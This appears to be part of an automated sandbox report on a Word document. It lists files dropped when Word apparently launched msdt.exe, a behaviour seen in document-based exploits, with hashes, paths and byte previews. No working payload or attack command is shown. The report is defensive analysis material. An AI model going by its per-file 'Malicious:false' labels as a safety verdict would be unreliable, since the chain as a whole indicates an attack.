                                                                                                                                                                      SHA1:3CD89F9EFCC926EFCAED14A32447CF4FA5CF71C0
                                                                                                                                                                      SHA-256:BEA495B174127D5766239B72098729676749D125123E2E495687F098C0C51A7F
                                                                                                                                                                      SHA-512:699BE66D691484E61B92F08BA27AB563BB48D257C1FC65F65CCA086B184EC0EAEB23878C6121EE63CA5CFAB7B4DDCA6687FAB3EE95CC101DF414643272240E53
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!................>*... ...@....... ....................................@..................................)..S....@.......................`....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................ *......H....... ".............................................................."..(....*J.#(....r...p(....*..(....*2~.....(....*....0.......... ....s..... ....s...............r;..p.........(......s.............5.....".....5.....3+E...../...(.-...2.3+1...:3...+)....3...+....+...+...+...+...,...+...+......r;..p...o................ ...o.........+Y.......r=..p..o......1.r=..p..o..........+(r...p..o...........(........r...p(.........X.......i2..........(.........o........o....-.r...p....

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\i3ghm531\CSCC6D89D5E8D544281B069B8814BE4D14E.TMP

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                      File Type:MSVC .res
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):652
                                                                                                                                                                      Entropy (8bit):3.11145665806792
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryd9ak7Ynqq2SPN5Dlq5J:+RI+ycuZhN9akSLPNnqX
                                                                                                                                                                      MD5:E9549296A3E219BE4564CF14A090740B
                                                                                                                                                                      SHA1:77CD8D88D1CDAB155492F98D34EDCC59AB7DB6F5
                                                                                                                                                                      SHA-256:F79F6A4A3E7CC613B15D726492556057E4412FD788E3A3BF35297499DACCBBFD
                                                                                                                                                                      SHA-512:E7BED82FB85D1520F3157836119F0A20F98522AA2680FF4DEA29CF32B0CF8BC5D5B62B3FA7A0C3A80BA5589097D81E83E77D5424B902C8C6EA0C4E9F667F58EE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.3.g.h.m.5.3.1...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...i.3.g.h.m.5.3.1...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\i3ghm531\i3ghm531.dll

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3584
                                                                                                                                                                      Entropy (8bit):3.088648770844524
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:etGSo89pz1qlkCe745Q7GslPor9jvX5ekjV4gztkZfhy6Iv+CqzOBWI+ycuZhN9B:6dpqb927GslPyDRjyJhok1ul9a3hq
                                                                                                                                                                      MD5:3BC757DB7B82771A228AC8E6B156076A
                                                                                                                                                                      SHA1:E8E6F16F1469AFFB683D65208D5DF1BE4D738473
                                                                                                                                                                      SHA-256:ED86906E5744CF340300AD2CA8F96FE0D04EF4EB01770E9B9E0FDF17F90B3A73
                                                                                                                                                                      SHA-512:BB091D5BFF577921887F0C8CEA33B50B2C00D38A773BC6DB1A7EE6460656C1E30A95E887001631AC623D30AFE0870DC61D0642DF2BBFDB719E413FD116E495E1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!.................%... ...@....... ....................................@..................................$..K....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H........ ..4............................................................0..6....... ....s........o....(....,..o....r...pr...po....*~....*F.r...pr...po....*..(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......t...#Blob...........W=........%3............................................................................2.+...N.B.....................0.....W.......+.............................Q.9.......... \.....P ......j...... ..

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\doc782.LNK

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:28:53 2022, mtime=Wed Jun 8 01:50:16 2022, atime=Wed Jun 8 01:50:04 2022, length=10144, window=hide
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1045
                                                                                                                                                                      Entropy (8bit):4.711472390862526
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:8hAdC0A0UH6CHic4FpGXQDHs+WGG3A/bYbjAA/y/lHm2NDyUDk36k3o4t2Y+xIBx:8hk+JOkKHdqA0AAKJDyg7aB6m
                                                                                                                                                                      MD5:25480BE39C79A08C7076EA996A394D31
                                                                                                                                                                      SHA1:2D2D42155FA93FAF073DA0A3F1257ABC2575F3B6
                                                                                                                                                                      SHA-256:2390F6D1EB3B92CAEBBF23BD87C2F87D6DF960DA6624AC32D271D75F93797D08
                                                                                                                                                                      SHA-512:25B330A517002DEA83F6BF9004D97D8DAFD45B6FB366F124DDDD767DE1768BBDC0AF7A5A43323636D08D47C85ABC54EE65F77C37F96A222DC9ADC398950FCA2C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:L..................F.... ....V..3...G.{.z../.]t.z...'...........................P.O. .:i.....+00.../C:\...................x.1......Ng...Users.d......L...T9.....................:......B..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....T.1.....hT....user..>.......NM..T9......S......................K.a.l.f.o.n.s.....~.1.....hT....Desktop.h.......NM..T9......Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....d.2..'...TC. .DOC782~1.DOC..H......hT...TC.............................".d.o.c.7.8.2...d.o.c.x.......R...............-.......Q...........>.S......C:\Users\user\Desktop\doc782.docx..".....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.7.8.2...d.o.c.x.........:..,.LB.)...Aw...`.......X.......855271...........!a..%.H.VZAj...-..s.........W...!a..%.H.VZAj...-..s.........W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@.

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):64
                                                                                                                                                                      Entropy (8bit):4.601202445739505
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:bDuMJlZIbFXCmxWKIbFXCv:bCSa6c
                                                                                                                                                                      MD5:538F5016C24249AC1799BBBB20B4BD97
                                                                                                                                                                      SHA1:1B0ECD98E7D3BFECA78B00528138FA8D84F35BED
                                                                                                                                                                      SHA-256:249CC3AF3819FB4142D7A65254BD454ACF580489E19A50D71007A7E998B4A70F
                                                                                                                                                                      SHA-512:E0E8040389BABFFD046E57AAD3ECFEE9A9171B4D00EC75EE3DF48710FC452C479692121776D17DCBCCC72E4A1CA0B6570484C007B282C9DBF05EDD34C9463EDA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:[folders]..Templates.LNK=0..doc782.LNK=0..[misc]..doc782.LNK=0..

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):162
                                                                                                                                                                      Entropy (8bit):3.039103887420846
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Rl/Zd0ittlqKCxPPGdbxrPuW/qPUVq:RtZaigTPGZgW/q0q
                                                                                                                                                                      MD5:DE9AD1CB34B9BEEDE78CB381CC573070
                                                                                                                                                                      SHA1:BC4E47C54B28A8D1F9BE0FDBF32D2904923A1835
                                                                                                                                                                      SHA-256:711F0F0DFD92AC6ECE1EE5E7395FD0C19C19C20827626DD9B5D69900C7D5877C
                                                                                                                                                                      SHA-512:C136D5A08132BF9E1D7705498F2056948873F7D7914C73FE31983B7C66DBEB23850321D11D21CD5E1399D3C4ED937388BD0A5674BC0E016504F16587D9720BFF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.pratesh................................................p.r.a.t.e.s.h.........#k.../..........T.......6C......'k...0...^.j@..jT..j`..jDB.jZR.j[k...1..........H...

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):20
                                                                                                                                                                      Entropy (8bit):2.8954618442383215
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:QVNliGn:Q9rn
                                                                                                                                                                      MD5:C4F79900719F08A6F11287E3C7991493
                                                                                                                                                                      SHA1:754325A769BE6ECCC664002CD8F6BDB0D0B8CA4D
                                                                                                                                                                      SHA-256:625CA96CCA65A363CC76429804FF47520B103D2044BA559B11EB02AB7B4D79A8
                                                                                                                                                                      SHA-512:0F3C498BC7680B4C9167F790CC0BE6C889354AF703ABF0547F87B78FEB0BAA9F5220691DF511192B36AD9F3F69E547E6D382833E6BC25CDB4CD2191920970C5F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:..p.r.a.t.e.s.h.....

                                                                                                                                                                      C:\Users\user\Desktop\~$doc782.docx

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):162
                                                                                                                                                                      Entropy (8bit):3.039103887420846
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Rl/Zd0ittlqKCxPPGdbxrPuW/qPUVq:RtZaigTPGZgW/q0q
                                                                                                                                                                      MD5:DE9AD1CB34B9BEEDE78CB381CC573070
                                                                                                                                                                      SHA1:BC4E47C54B28A8D1F9BE0FDBF32D2904923A1835
                                                                                                                                                                      SHA-256:711F0F0DFD92AC6ECE1EE5E7395FD0C19C19C20827626DD9B5D69900C7D5877C
                                                                                                                                                                      SHA-512:C136D5A08132BF9E1D7705498F2056948873F7D7914C73FE31983B7C66DBEB23850321D11D21CD5E1399D3C4ED937388BD0A5674BC0E016504F16587D9720BFF
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:.pratesh................................................p.r.a.t.e.s.h.........#k.../..........T.......6C......'k...0...^.j@..jT..j`..jDB.jZR.j[k...1..........H...

                                                                                                                                                                      C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\DiagPackage.diagpkg

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):24702
                                                                                                                                                                      Entropy (8bit):4.37978533849437
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:fO3MDP8m2xaqade1tXv8v/XPSwTkal+7lOaNeHdXQZvczyJuz4UnPz0Kuz+NGTEP:O5NzuCWNaEcU8mjapMVOHW
                                                                                                                                                                      MD5:191959B4C3F91BE170B30BF5D1BC2965
                                                                                                                                                                      SHA1:1891E3CB588516B94FDC53794DA4DF5469A4C6D0
                                                                                                                                                                      SHA-256:8EC3A8F67BAF1E4658FC772F9F35230CA1B0318DDAF7A4C84789A329B6F7F047
                                                                                                                                                                      SHA-512:092CC417FBFE7F6E02A60FF169209D7B60362B585CBF92521BFC71C0B378D978DFB9265A3E48C630CE6ABAB263711D71F3917FFAF51B6FD449CFC394E9D8C3A9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<dcmPS:DiagnosticPackage SchemaVersion="1.0" Localized="true" xmlns:dcmPS="http://www.microsoft.com/schemas/dcm/package/2007" xmlns:dcmRS="http://www.microsoft.com/schemas/dcm/resource/2007">.. <DiagnosticIdentification>.. <ID>PCW</ID>.. <Version>3.0</Version>.. </DiagnosticIdentification>.. <DisplayInformation>.. <Parameters/>.. <Name>@diagpackage.dll,-1</Name>.. <Description>@diagpackage.dll,-2</Description>.. </DisplayInformation>.. <PrivacyLink>https://go.microsoft.com/fwlink/?LinkId=534597</PrivacyLink>.. <PowerShellVersion>2.0</PowerShellVersion>.. <SupportedOSVersion clientSupported="true" serverSupported="true">6.1</SupportedOSVersion>.. <Troubleshooter>.. <Script>.. <Parameters/>.. <ProcessArchitecture>Any</ProcessArchitecture>.. <RequiresElevation>false</RequiresElevation>.. <RequiresInteractivity>true</RequiresInteractivity>.. <FileName>TS_ProgramCompatibilityWizard.ps1</FileName>.. <ExtensionPoint/>.. </Script>..

                                                                                                                                                                      C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\DiagPackage.dll

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):66560
                                                                                                                                                                      Entropy (8bit):6.926109943059805
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:ytBGLADXf3iFGQ+/ReBQBJJgUKZgyxMBGb:ytBGcDXvKoRqKuxgyx
                                                                                                                                                                      MD5:6E492FFAD7267DC380363269072DC63F
                                                                                                                                                                      SHA1:3281F69F93D181ADEE35BC9AD93B8E1F1BBF7ED3
                                                                                                                                                                      SHA-256:456AE5D9C48A1909EE8093E5B2FAD5952987D17A0B79AAE4FFF29EB684F938A8
                                                                                                                                                                      SHA-512:422E2A7B83250276B648510EA075645E0E297EF418564DDA3E8565882DBBCCB8C42976FDA9FCDA07A25F0F04A142E43ECB06437A7A14B5D5D994348526123E4E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.PE..d....J_A.........." ......................................................... .......K....`.......................................................... ..`...............................8............................................................................rdata..............................@..@.rsrc...`.... ......................@..@.....J_A........T...8...8........J_A........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#.......rsrc$02.... .....;A.(.j..x..)V...Zl4..w.E..J_A........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\RS_ProgramCompatibilityWizard.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                      File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):50242
                                                                                                                                                                      Entropy (8bit):4.932919499511673
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:/wugEs5GhrQzYjGBHvPbD9FZahXuDzsP6qqF8DdEakDiqeXacgcRjdhGPtQMHQF4:/c5AMHvDDf2VE+quAiMw4
                                                                                                                                                                      MD5:EDF1259CD24332F49B86454BA6F01EAB
                                                                                                                                                                      SHA1:7F5AA05727B89955B692014C2000ED516F65D81E
                                                                                                                                                                      SHA-256:AB41C00808ADAD9CB3D76405A9E0AEE99FB6E654A8BF38DF5ABD0D161716DC27
                                                                                                                                                                      SHA-512:A6762849FEDD98F274CA32EB14EC918FDBE278A332FDA170ED6D63D4C86161F2208612EB180105F238893A2D2B107228A3E7B12E75E55FDE96609C69C896EBA0
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#This is passed from the troubleshooter via 'Add-DiagRootCause'..PARAM($targetPath, $appName)....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008..#rfink - 01 Sept 2008 - rewrite to support dynamic choices....#set-psdebug -strict -trace 0....#change HKLM\Software\Windows NT\CurrentVersion\AppCompatFlags\CompatTS EnableTracing(DWORD) to 1..#if you want to enable tracing..$SpewTraceToDesktop = $false....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....#Compatibility modes..$CompatibilityModes = new-Object System.Collections.Hashtable..$CompatibilityModes.Add("Version_WIN8RTM", "WIN8RTM")..$CompatibilityModes.Add("Version_WIN7RTM", "WIN7RTM")..$CompatibilityModes.Add("Version_WINVISTA2", "VISTASP2")..$CompatibilityModes.Add("Version_WINXP3", "WINXPSP3")..$CompatibilityModes.Add("Version_MSIAUTO", "MSIAUTO")..$CompatibilityModes.Add("Version_UNKNOWN", "WINXPSP3")..$Comp

                                                                                                                                                                      C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\TS_ProgramCompatibilityWizard.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                      File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):16946
                                                                                                                                                                      Entropy (8bit):4.860026903688885
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:3FptgXhu9IOM7BTDLwU7GHf7FajKFzB9Ww:Ghu9I9dQYWB9Ww
                                                                                                                                                                      MD5:2C245DE268793272C235165679BF2A22
                                                                                                                                                                      SHA1:5F31F80468F992B84E491C9AC752F7AC286E3175
                                                                                                                                                                      SHA-256:4A6E9F400C72ABC5B00D8B67EA36C06E3BC43BA9468FE748AEBD704947BA66A0
                                                                                                                                                                      SHA-512:AAECB935C9B4C27021977F211441FF76C71BA9740035EC439E9477AE707109CA5247EA776E2E65159DCC500B0B4324F3733E1DFB05CEF10A39BB11776F74F03C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#TS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....$ShortcutListing = New-Object System.Collections.Hashtable..$ExeListing = New-Object System.Collections.ArrayList..$CombinedListing = New-Object System.Collections.ArrayList....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....# Block PCW on unsupported SKUs..$BlockedSKUs = @(178)..[Int32]$OSSKU = (Get-WmiObject -Class "Win32_OperatingSystem").OperatingSystemSKU..if ($BlockedSKUs.Contains($OSSKU))..{.. return..}....$typeDefinition = @"....using System;..using System.IO;..using System.Runtime.InteropServices;..using System.Text;..using System.Collections;....public class Utility..{.. public static string GetStartMenuPath().. {.. return Environment.GetFolderPath(Environment.SpecialFolder.StartMenu);.. }.... public static string GetAllUsersStartMenuPath().. {.. return Path.Combine(Environ

                                                                                                                                                                      C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\VF_ProgramCompatibilityWizard.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                      File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):453
                                                                                                                                                                      Entropy (8bit):4.983419443697541
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:QcM3BFN+dxmVdyKVCkLZI4S2xhzoJNIDER5lI02xzS4svc3uVr:Qb3DQbeCklTxhzoJUoS02tCr
                                                                                                                                                                      MD5:60A20CE28D05E3F9703899DF58F17C07
                                                                                                                                                                      SHA1:98630ABC4B46C3F9BD6AF6F1D0736F2B82551CA9
                                                                                                                                                                      SHA-256:B71BC60C5707337F4D4B42BA2B3D7BCD2BA46399D361E948B9C2E8BC15636DA2
                                                                                                                                                                      SHA-512:2B2331B2DD28FB0BBF95DC8C6CA7E40AA56D4416C269E8F1765F14585A6B5722C689BCEBA9699DFD7D97903EF56A7A535E88EAE01DFCC493CEABB69856FFF9AA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#if this environment variable is set, we say that we don't detect the problem anymore so it will..#show as fixed in the final screen..PARAM($appName)....$detected = $true..if ($Env:AppFixed -eq $true)..{.. $detected = $false ..}....Update-DiagRootCause -id "RC_IncompatibleApplication" -iid $appName -Detected $detected....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....

                                                                                                                                                                      C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\en-US\CL_LocalizationData.psd1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6650
                                                                                                                                                                      Entropy (8bit):3.6751460885012333
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:q39pB3hpieJGhn8n/y7+aqwcQoXQZWx+cWUcYpy7I6D1RUh5EEjQB5dm:q39pRhp6Sy6wZifVEtjjFm
                                                                                                                                                                      MD5:E877AD0545EB0ABA64ED80B576BB67F6
                                                                                                                                                                      SHA1:4D200348AD4CA28B5EFED544D38F4EC35BFB1204
                                                                                                                                                                      SHA-256:8CAC8E1DA28E288BF9DB07B2A5BDE294122C8D2A95EA460C757AE5BAA2A05F27
                                                                                                                                                                      SHA-512:6055EC9A2306D9AA2F522495F736FBF4C3EB4078AD1F56A6224FF42EF525C54FF645337D2525C27F3192332FF56DDD5657C1384846678B343B2BFA68BD478A70
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:..#. .L.o.c.a.l.i.z.e.d...0.4./.1.1./.2.0.1.8. .0.2.:.0.5. .P.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....#. .L.o.c.a.l.i.z.e.d...0.1./.0.4./.2.0.1.3. .1.1.:.3.2. .A.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....C.o.n.v.e.r.t.F.r.o.m.-.S.t.r.i.n.g.D.a.t.a. .@.'.....#.#.#.P.S.L.O.C.....P.r.o.g.r.a.m._.C.h.o.i.c.e._.N.O.T.L.I.S.T.E.D.=.N.o.t. .L.i.s.t.e.d.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.D.E.F.A.U.L.T.=.N.o.n.e.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.8.R.T.M.=.W.i.n.d.o.w.s. .8.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.7.R.T.M.=.W.i.n.d.o.w.s. .7.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.V.I.S.T.A.2.=.W.i.n.d.o.w.s. .V.i.s.t.a. .(.S.e.r.v.i.c.e. .P.a.c.k. .2.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.X.P.S.P.3.=.W.i.n.d.o.w.s. .X.P. .(.S.e.r.v.i.c.e. .P.a.c.k. .3.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.M.S.I.A.U.T.O.=.S.k.i.p. .V.e.r.s.i.o.n. .C.h.e.c.k.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.U.N.

                                                                                                                                                                      C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\en-US\DiagPackage.dll.mui

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):10752
                                                                                                                                                                      Entropy (8bit):3.517898352371806
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:Gmw56QoV8m7t/C7eGu7tCuKFtrHQcoC1dIO4Pktmg5CuxbEWgdv0WwF:WAQovu548tmirAWu8Wm
                                                                                                                                                                      MD5:CC3C335D4BBA3D39E46A555473DBF0B8
                                                                                                                                                                      SHA1:92ADCDF1210D0115DB93D6385CFD109301DEAA96
                                                                                                                                                                      SHA-256:330A1D9ADF3C0D651BDD4C0B272BF2C7F33A5AF012DEEE8D389855D557C4D5FD
                                                                                                                                                                      SHA-512:49CBF166122D13EEEA2BF2E5F557AA8696B859AEA7F79162463982BBF43499D98821C3C2664807EDED0A250D9176955FB5B1B39A79CDF9C793431020B682ED12
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.................PE..L..................!.........(...............................................P...........@.......................................... ...$..............................8............................................................................rdata..............................@..@.rsrc....0... ...&..................@..@......E.........T...8...8.........E.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#..0!...rsrc$02.... .......OV....,.+.(,..vA..@..E.........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\result\results.xsl

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):48956
                                                                                                                                                                      Entropy (8bit):5.103589775370961
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:768:hUeTHmb0+tk+Ci10ycNV6OW9a+KDoVxrVF+bBH0t9mYNJ7u2+d:hUcHXDY10tNV6OW9abDoVxrVF+bBH0tO
                                                                                                                                                                      MD5:310E1DA2344BA6CA96666FB639840EA9
                                                                                                                                                                      SHA1:E8694EDF9EE68782AA1DE05470B884CC1A0E1DED
                                                                                                                                                                      SHA-256:67401342192BABC27E62D4C1E0940409CC3F2BD28F77399E71D245EAE8D3F63C
                                                                                                                                                                      SHA-512:62AB361FFEA1F0B6FF1CC76C74B8E20C2499D72F3EB0C010D47DBA7E6D723F9948DBA3397EA26241A1A995CFFCE2A68CD0AAA1BB8D917DD8F4C8F3729FA6D244
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml version="1.0"?>..<?Copyright (c) Microsoft Corporation. All rights reserved.?>..<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:ms="urn:microsoft-performance" exclude-result-prefixes="msxsl" version="1.0">...<xsl:output method="html" indent="yes" standalone="yes" encoding="UTF-16"/>...<xsl:template name="localization">....<_locDefinition>.....<_locDefault _loc="locNone"/>.....<_locTag _loc="locData">String</_locTag>.....<_locTag _loc="locData">Font</_locTag>.....<_locTag _loc="locData">Mirror</_locTag>....</_locDefinition>...</xsl:template>... ********** Images ********** -->...<xsl:variable name="images">....<Image id="check">res://sdiageng.dll/check.png</Image>....<Image id="error">res://sdiageng.dll/error.png</Image>....<Image id="info">res://sdiageng.dll/info.png</Image>....<Image id="warning">res://sdiageng.dll/warning.png</Image>....<Image id="expand">res://sdiageng.dll/expand.png</Image>....<Image id="

                                                                                                                                                                      Static File Info

                                                                                                                                                                      General

                                                                                                                                                                      File type:Microsoft OOXML
                                                                                                                                                                      Entropy (8bit):7.869060797789825
                                                                                                                                                                      TrID:
                                                                                                                                                                      • Word Microsoft Office Open XML Format document (49504/1) 49.01%
                                                                                                                                                                      • Word Microsoft Office Open XML Format document (43504/1) 43.07%
